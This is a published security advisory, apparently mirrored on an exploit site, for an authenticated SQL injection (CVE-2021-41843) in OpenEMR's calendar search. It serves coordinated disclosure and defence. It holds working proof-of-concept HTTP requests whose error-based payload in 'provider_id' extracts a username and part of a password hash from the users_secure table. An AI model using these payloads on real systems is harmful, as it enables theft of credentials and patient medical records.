Share
## https://sploitus.com/exploit?id=PACKETSTORM:165301
# Trovent Security Advisory 2109-01 #  
#####################################  
  
  
Authenticated SQL injection in OpenEMR calendar search  
######################################################  
  
  
Overview  
########  
  
Advisory ID: TRSA-2109-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2109-01  
Affected product: OpenEMR web application  
Tested versions: 6.0.0, 6.1.0-dev  
Vendor: OpenEMR project, https://www.open-emr.org  
Credits: Trovent Security GmbH, Stefan Pietsch  
  
  
Detailed description  
####################  
  
The OpenEMR web application is a medical practice management software and can  
be used to store electronic medical records.  
Trovent Security GmbH discovered an SQL injection vulnerability in the search  
function of the calendar module. The parameter 'provider_id' is injectable.  
The attacker needs a valid user account to access the calendar module of the  
web application. It is possible to read data from all tables of the database.  
  
Severity: Medium  
CVSS Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)  
CWE ID: CWE-89  
CVE ID: CVE-2021-41843  
  
  
Proof of concept  
################  
  
(1) HTTP request to read a username from the database table 'openemr.users_secure':  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1  
Content-Length: 324  
Host: 172.18.0.3  
Content-Type: application/x-www-form-urlencoded  
Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q  
Connection: close  
  
pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021&  
provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28username  
%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Submit  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
(2) HTTP response to (1):  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
HTTP/1.1 200 OK  
Date: Fri, 17 Sep 2021 07:26:48 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:28 GMT; Max-Age=28000; path=/; SameSite=Strict  
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:29 GMT; Max-Age=28000; path=/; SameSite=Strict  
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  
X-XSS-Protection: 1; mode=block  
Content-Length: 27  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
XPATH syntax error: 'admin'  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
(3) HTTP request to read a password hash from the database table 'openemr.users_secure':  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1  
Content-Length: 324  
Host: 172.18.0.3  
Content-Type: application/x-www-form-urlencoded  
Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q  
Connection: close  
  
pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021&  
provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password  
%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Submit  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
(4) HTTP response to (3):  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
HTTP/1.1 200 OK  
Date: Fri, 17 Sep 2021 07:27:29 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; Max-Age=28000; path=/; SameSite=Strict  
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; Max-Age=28000; path=/; SameSite=Strict  
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  
X-XSS-Protection: 1; mode=block  
Content-Length: 44  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
XPATH syntax error: '$2y$10$ukudH2lRSW2vKX.'  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Solution / Workaround  
#####################  
  
Limit access to the calendar search function until the vulnerability is fixed.  
  
Fixed in OpenEMR version 6.0.0 patch 3, verified by Trovent.  
  
  
History  
#######  
  
2021-09-16: Vulnerability found  
2021-09-29: Advisory created & vendor contacted  
2021-09-30: Vendor acknowledged vulnerability, CVE ID requested  
2021-10-01: CVE ID received  
2021-10-19: Vendor releases OpenEMR version 6.0.0 patch 3  
2021-12-14: Add information about fixed version  
2021-12-15: Advisory published